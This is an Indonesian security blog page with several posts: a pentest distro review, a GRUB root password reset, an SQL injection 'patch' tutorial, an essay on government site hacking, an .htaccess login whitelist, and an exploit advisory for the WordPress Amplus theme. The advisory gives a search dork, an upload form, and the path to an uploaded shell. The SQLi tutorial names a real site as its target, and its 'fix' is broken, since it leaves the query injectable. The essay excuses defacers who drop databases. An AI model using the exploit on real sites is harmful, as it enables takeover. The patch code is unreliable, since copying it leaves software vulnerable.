Showing posts with label Security. Show all posts
  • DracOS Linux, Distro Pentest Karya Anak Bangsa

    Kemarin ( 27 Februari 2016) , versi final DracOS Linux v1.0 codename Vairusa dirilis. Versi final ini tentu membawa banyak penyempurnaan dari versi pre-test yang dirilis sebelumnya. Dan kali ini saya akan mereview DracOS Linux versi pertama ini.
    dracos-linux.org
    Sebelumnya, mungkin ada yang bertanya apa apa itu DracOS Linux ? Turunan dari distro apa ?
    Oke, DracOS Linux adalah sistem operasi linux, bersifat opensource yang di bangun berdasarkan Linux From The Scratch. Dracos linux di bawah perlindungan GNU General Public License v3.0. Sistem operasi ini merupakan salah satu varian distro linux , yang di gunakan untuk melakukan pengujian security (penetration testing).
    Dracos linux di bekali oleh ratusan tools pentest, forensics dan reverse engineering. Dracos linux tidak menggunakan tools-tools berbasis GUI dan hanya memilki perangkat lunak yang menggunakan CLI (command line interface) untuk melakukan operasinya.
    Jadi, DracOS Linux ini dibangun dari awal (Linux From The Scratch), bukan turunan distro lain.
    Dan seperti yang sudah dijelaskan sebelumnya, DracOS Linux merupakan distro Linux yang ditujukan untuk kegiatan pengujian security. Lalu apa bedanya dengan distro lain seperti Cyborg, Kali , Arch , dll ?

    DracOS lebih memfokuskan ke performa sehingga hampir semua tools / aplikasi nya dijalankan dengan CLI.
    Dan DracOS Linux v1.0 ini menggunakan DWM sebagai DE nya, dimana di versi pre-test mereka menggunakan openbox.
    Berikut list perubahan dan penambahan tools di versi DracOS Linux v1.0
    Kernel support
    • recompile kernel 4.2.0 with various sound driver support
    Shell
    • added dash
    Desktop environment
    • remove openbox ( not need anymore )
    • remove conky ( not need anymore )
    • remove lxpanel ( not need anymore )
    • added DWM,dmenu,dwmstatus
    • added GPM daemon
    • added XKeyboardConfig support
    • added fribidi support for arabic font
    • added giflib support
    • added keymap compiler and support library (libxkbcommon)
    • added aalib for ascii support
    Programming support
    • added yasm
    • GC with libatomic_ops support
    • added check suport for compiler
    • added GNU Scientific Library (GSL)
    • adding asynchronous event notification software library (libevent)
    • adding popt libraries
    • adding portable POSIX/ANSI-C based library for Unix platforms (npth)
    • dynamic library load path (rpath and runpath) (chrpath)
    Network support
    • added links2 upgrade LibTIFF version
    • added samba protocol
    • added OpenLDAP
    • added Cyrus SASL
    • added git support
    • added rdesktop
    • added bind tools for dig, host, and nslookup command
    • added libidn support
    • added libesmtp libraries
    • added libndp is a wrapper for IPv6 Neighbor Discovery Protocol
    • added Heirloom mailx
    • added ldns (DNS library)
    Penetration tools
    • added activerecord sqlite3-ruby ( for karma metasploit support)
    • added hamster and ferret
    • added smtp-user-enum
    Multimedia support
    • added daemon pulseaudio
    • added depend : JSON-C, libsndfile
    • added cmus console music player like moc (support wav, mp3 with libmad)
    • added recordmydesktop
    Manajemen
    • added fcron for cron job
    • added p7zip for 7zip support
    • added lm_sensors for sensors cpu detection
    • added initd-tools for LSB support
    • added dbus-glib support
    • added exif2 for managing image and video metadata.
    • added libexif for arsing, editing, and saving EXIF data
    • added libsigsegv
    • added Power management tools (pm-utils)
    • added support for 'shell' archives (sharutils)
    • added support for Open Source ODBC (Open DataBase Connectivity) sub-system and an ODBC SDK for Linux (unixODBC)
    • added sysstat tools for driving cron and enable cifsiostat, iostat, mpstat, pidstat, sadf, sar, and tapestat command
    • added tree for manajemen file tree
    Fix bug
    • more bug fix for DE
    • fix isc-dhcp-server
    • more bug fix for tools
    • fix alsa driver
    Bagaimana cara install nya ?
    Menurut keterangan yang saya dapat dari salah satu developer DracOS yaitu mas Zico Ekel, DracOS bukan standalone os. Alias tidak bisa berdiri sendiri.
    Jadi kalian bisa menginstall nya dengan melakukan dual boot dengan linux lain, harus linux loh ya, gak bisa di dual boot sama jendela, android x86 juga tidak bisa.
    Cara nya?
    Nah kebetulan salahsatu Reporter di tim pengembang DracOS Linux ( Randall Tux ) sudah menulis tutorial penginstallan DracOS Linux ini.
    HOW TO INSTALL DRACOS USING RSYNC

    Nah mungkin ada yang bingung dengan pengoperasian DWM pada DracOS Linux , kalian bisa melihat video nya disini :
    How to Use DWM on DracOS Linux

    Tertarik ?
    Kalian bisa mendownload DracOS Linux di Repo Resmi nya :
    http://mirror.indonesianbacktrack.or.id/?dir=DracOs/iso

    Atau kalian tertarik untuk memirror kan repo DracOS, kalian bisa menghubungi salahsatu Tim DracOS Linux di email rndtx[at]dracos-linux[dot]id

    Jika kalian mengalami kesulitan atau mengalami masalah dengan DracOS Linux, kalian bisa mendiskusikan nya di forum DracOS.
    https://dracos-linux.org/projects/dracoslinux/boards

    Tentu saja kalian harus registrasi terlebih dahulu.
    Sekian review kali ini, go linux go opensource !


    Post Copied From LinuxSec
  • Cara Mudah Reset Password Ubuntu dan Debian

    Kadang kita lupa password login OS kita. Banyak penyebab nya sih, bisa jadi pas install buat password nya ngasal atau bisa juga kita lama tidak membuka laptop / PC karena kesibukan tertentu. Nah buat yang mengalami kejadian kejadian tersebut, jangan panik dulu . Tidak perlu install ulang . Kita bisa mereset password Ubuntu atau Debian via grub linux.
    Oke langsung saja ke tutorial.
    Saat masuk tampilan grub , tekan tombol "e" di keyboard.
    Lalu cari kata "quiet" dan tambahkan "init=/bin/bash" sehingga menjadi "quiet init=/bin/bash" .
    Setelah itu, klik Ctrl + X agar melakukan booting.
    Maka kita akan masih ke root shell.
    Masukkan command 
    # mount -rw -o remount /
    Ini bertujuan agar partisi root dalam keadaan read write.
    Selanjutnya tinggal
    # passwd uzumaki ( sesuaikan sendiri username kalian ) .
    # exit
    Maka komputer akan reboot , lanjut sampai ke login screen ubuntu  debian.
    masukkan password baru yang sudah di set sebelum nya.
    Jika step step diatas benar harus nya masuk ke desktop.
    Nah kalau masih bingung nih video nya :



    Untuk OS lain gimana mas ?
    Selama itu masih turunan Ubuntu atau Debian bisa .
    Kali Linux, Cyborg Hawk, BackBox, Linux Mint, dll .
    Sekian tutorial kali ini, semoga bermanfaat.
  • Cara Patch Bug SQL Injection



    Assalamuallaikum.. kali ini saya mau berbagi tutorial Patch bug SQLi atau SQL Injection.


    Bug ini merupakan bug yang terlihat terlalu sepele namun sangat besar bahayanya. karena dengan bug ini, hacker dapat mengeksrtak serta mencuri dan semua data pada database situs, termasuk user admin serta password atau juga data valid kartu kredit jika website yang diserang berupa shopping Web.

    Salah satu kasus di Indonesia adalah website resmi Polri yang kena bobol berkali-kali karena sang admin yang bisa dibilang tidak tahu security karena bug se tenar SQLi aja tidak tahu.

    Ada juga server balitbang juga kena retas. Penyebabnya adalah exploit 0day pada CMS Balitbang yang sering digunakan situs sekolah. Exploitnya ditemukan oleh team sec7or. Dan parahnya lagi, si attacker/hacker berhasil melakukan rooting atau previledge escallation dengan memanfaatkan exploit kernel. Sehingga web yang satu server dengan balitbang akan terkena dampaknya. Ibarat kata, tumbang satu, tumbang semua. Berikut adalah daftar situs yang terkena imbas dari rooting server balitbang tersebut: http://pastebin.com/j0tirM4G

    Nih Mirrornya : http://www.zone-h.org/mirror/id/23402942?zh=2  

    Percuma kalo tampilan web bener lagi, tapi ujung-ujungnya juga ntar masih ada bug SQLi-nya. Untuk itu saya membuat artikel ini. Semoga admin-admin di indonesia bisa lebih sadar akan ancaman cyber crime dan selalu belajar mengenai security.




    Langsung ssaja... 
    target saya : http://www.mohiniwebsolution.in/csl/gallery.php?id=2' 


    sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake notepad++ just info ;) hehehehe. Ini dia sebagian isi dari filenya : (disini saya file galerry.php)

    <?php include 'admin/db.php' ?>
    <?php
    $id=$_GET['id'];

    if($id!="")
    {
    $sql6=" WHERE category=$id";
    }
    ?>

    Bugnya ada di script bagian ini : <?php $id=$_GET['id'];

    tidak adanya filter di $_GET[postid] menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :

    <?php include 'admin/db.php' ?>
    <?php
    //filter start here
    $postid= $_GET['postid'];
    $ip = GETENV("REMOTE_ADDR");

    if($id!="")
    {
    $sql6=" WHERE category=$id";
    }
    ?>


    sekarang coba buka lagi page vulnerable dan tambahkan single quote(‘) dan tarra proses patching telah berhasil

     
     
    Kenapa saya katakan vuln-nya sudah hilang ? Karena untuk tanda vulnerability pada sql adalah, ketika di akhir url saya beri tanda ' , halaman menunjukkan peringatan error sseperti "Warning: mysql_fetch_array........." , tapi setelah saya set ulang untuk sksrip parameter gallery.php nya. Peringatan Warning tidak muncul meski saya beri tanda ' di akhir URL. 
     
    Ada juga tanda vuln SQLi yang lain, biasanya adalah ada bagian konten web yang menghilang secara misterius :D , seperti gambarnya berkurang atau rusak.
     
    Cukup ssekia dari saya, semoga bissa bermanfaat untuk anda.

  • Inilah Alasan Situs Pemerintah Indonesia Gampang Diretas

    Beberapa hari yang lalu situs Sekretariat Kabinet RI dan juga situs Lemhannas diretas hacker. Bisa dibilang menjadi sambutan tahun baru yang cukup memalukan untuk pemerintah. Sebelum itu juga sudah sering website .go.id berterbaran di situs mirror zone-h.org. Kenapa sih situs Pemerintah RI kesannya kok gampang banget dibobol ?
    Inilah beberapa faktor nya, menurut LinuxSec :
    Situs Pemerintah
    1. Belum Memakai Secure Hosting

    Kadang website website pemerintahan masih numpang di shared hosting, shared hosting murahan pula. Akibatnya jadi rawan symlink. Sekuat apapun website nya, kalo hosting nya masih cupu, ya percuma. Tinggal cari web yang nge bug di satu server, lalu jumping deh.

    Makanya jangan heran kalau kadang ada web pemerintah dihargai ratusan juta tapi security seluas pantat. Banyak yang masuk kantong daripada yang buat bener bener ke website.

    2. Belum Menggunakan Secure Coding

    CMS OpenSource macam WP dan Joomla memang memudahkan pembangunan website. Tapi CMS tersebut juga menjadi objek peretas untuk mencari eksploitasi. Itulah kenapa di exploit-db banyak sekali exploit untuk cms wp dan joomla. Apalagi kadang menggunakan CMS OpenSource, tanpa pengamanan samasekali. URL login masih default, lebih parah lagi password login juga default. Parah !

    Lebih baik jika CMS Pemerintahan menggunakan codingan sendiri, toh mereka bayar mahal ke developernya, masa iya gaji ratusan juta pake cms gratisan. lol.

    3. Jarang Melakukan Penetration Test

    Web web pemerintahan kita bisa dibilang sangat sangat mengecewakan terutama dalam hal maintenance. Bahkan kita bisa melihat awal situs revolusi mental dirilis, code nyolong dari web barrack obama.

    Bahkan banyak situs go.id terkesan dibuat asal asalan. Satu web sejuta bug. Vuln SQLi, Password tidak di hash, dan setelah login ternyata tidak ada filter upload nya, kita bisa mengupload backdoor php di form upload image.

    4. Poor Patch Management

    Ini terlihat sekali di kasus website pemerintahan kita. Saat berhasil masuk atau menemukan celah di website go.id , sebenarnya banyak juga defacer yang terlebih dahulu mengirim email ke webmaster agar segera memperbaiki celah di web nya. Namun alih alih diperbaiki, email saja tidak direspon. Itulah kenapa kadang si defacer memilih langsung drop db saja kalau bertemu web pemerintahan, karena merasa tidak dihargai.

    5. Kesadaran SDM Masih Kurang


    Keamanan situs maupun jaringan IT instansi pemerintah sebenarnya bukan hanya tanggungjawab admin semata. Para pengambil kebijakan di tataran atas juga bertanggung jawab sejak pembangunan situs dan jaringan IT. Pemilihan developer misalnya, bila pengambil kebijakan tak paham benar mana yang aman, bisa jadi developer dengan tawaran situs bertemplate wordpress mislanya, akan menang.

    Akibatnya jelas, dengan template modifikasi Wordpress yang umum, celah keamanan lebih banyak dan terbuka. Bahkan di forum-forum internet peretas pemula di bagikan celah keamanan untuk banyak template, sehingga itu menjadi sasaran latihan melakukan deface sebuah situs.

    Manusia sebagai pihak yang menjalankan sistem adalah kunci sejak proses perencanaannya. Oleh karena itu perlu dibangun sebuah usaha untuk meningkatkan kesadaran keamanan cyber untuk seluruh pegawai pemerintahan. Hal ini bisa menekan risiko terjadinya serangan pada situs pemerintah, dan meningkatkan keamanan jaringan IT yang ada di lembaga pemerintah.

    Sumber : LinuXsec

  • Membatasi Akses ke Halaman Login WordPress dengan .htaccess

    Kadang pengguna CMS WordPress melakukan proteksi halaman login dengan menggunakan plugins. Namun hal itu tidak berarti jika attacker berhasil masuk ke database. Plugins tersebut bisa di disable dan Halaman Login WP menjadi tidak ter-proteksi lagi.
    Nah kali ini, saya akan share tutorial untuk memproteksi halaman login WP dengan htaccess Sehingga berbeda dengan plugins yang terkoneksi dengan database, htaccess bekerja secara terpisah.
    yang saya share kali ini adalah file htaccess yang membatasi IP yang dapat mengakses halaman login. Sehingga hanya ip yang di whitelist saja yang bisa mengakses nya. :D
    Berikut tutorial nya.
    Edit file .htaccess di root path wordpress kalian lalu tambahkan kode berikut dibawahnya :
    <Files wp-login.php>
            order deny,allow
            Deny from all

    # whitelist Jack Wilder
    allow from xx.xx.xx.xx

    </Files>
    # END WordPress
    Jangan lupa chmod nya 644 .

    Kalian bisa login secara bebas dari ip yang di whitelist.




    Namun akan forbidden jika diakses dari ip yang tidak ada di whitelist.



    Mudah bukan ?
    Dengan begitu keamanan wordpress kalain akan meningkat.
    Dan jangan lupa untuk selalu update jika ada patch wp versi terbaru.




  • Wordpress Amplus Themes CSRF File Upload Vulnerability

    #Title : Wordpress Amplus Themes CSRF File Upload Vulnerability
     
    #Author : DevilScreaM
     
    #Date : 11/17/2013 - 17 November 2013
     
    #Category : Web Applications
     
    #Type : PHP
     
    #Vendor : http://themeforest.net
     
    #Download : http://themeforest.net/item/amplus-responsive-multilingual-wordpress-theme/
     
    #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
         Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
     
    #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
     
    #Tested : Mozila, Chrome, Opera -> Windows & Linux
     
    #Vulnerabillity : CSRF
     
    #Dork :
     
    inurl:wp-content/themes/amplus
     
     
    CSRF File Upload Vulnerability
     
    Exploit & POC :
     
    http://site-target/wp-content/themes/amplus/functions/upload-handler.php
     
    Script :
     
    <form enctype="multipart/form-data"
    action="http://127.0.0.1/wp-content/themes/amplus/functions/upload-handler.php" method="post">
    Your File: <input name="uploadfile" type="file" /><br />
    <input type="submit" value="upload" />
    </form>
     
     
    File Access :
     
    http://site-target/uploads/[years]/[month]/your_shell.php
     
    Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php

  • Nisekoi Template Designed by Johanes Djogan

    ©2016 - ReDesigned By Ani-Sudo